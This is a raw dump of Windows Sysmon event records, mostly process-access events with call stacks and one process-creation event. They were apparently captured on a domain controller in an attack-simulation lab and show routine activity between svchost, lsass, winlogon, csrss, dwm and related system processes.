12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004010Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004009Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004008Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004007Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004006Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004005Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004004Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004003Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004002Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004001Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-64C1-6064-9300-00000000AE01}872C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000004000Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-64C1-6064-9100-00000000AE01}51084328C:\Windows\system32\csrss.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003999Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-64C1-6064-9200-00000000AE01}25524384C:\Windows\system32\winlogon.exe{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\SYSTEM32\dwminit.dll+2d11|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003998Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.714{266CAFBE-64C1-6064-9400-00000000AE01}984C:\Windows\System32\dwm.exe10.0.14393.0 (rs1_release.160715-1616)Desktop Window ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationdwm.exe"dwm.exe"C:\Windows\system32\Window Manager\DWM-2{266CAFBE-64C1-6064-9FF5-090000000000}0x9f59f2SystemMD5=C89F159A577F19F7F03C73C98D29D841,SHA256=B3E37997C1C62DD90D69EF83D6A6FC782BF9A5B8AD04A0D1528A8B7FA31AA408,IMPHASH=DDB7DE3741333EE031929A760FCD4542{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\System32\winlogon.exewinlogon.exe 10341000x80000000000000003997Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1b160|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003996Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003995Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646A-6064-0B00-00000000AE01}856976C:\Windows\system32\lsass.exe{266CAFBE-64C1-6064-9200-00000000AE01}2552C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003994Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003993Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003992Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.707{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003991Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003990Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003989Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003988Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003987Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:09.692{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-6471-6064-2200-00000000AE01}2836C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003986Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 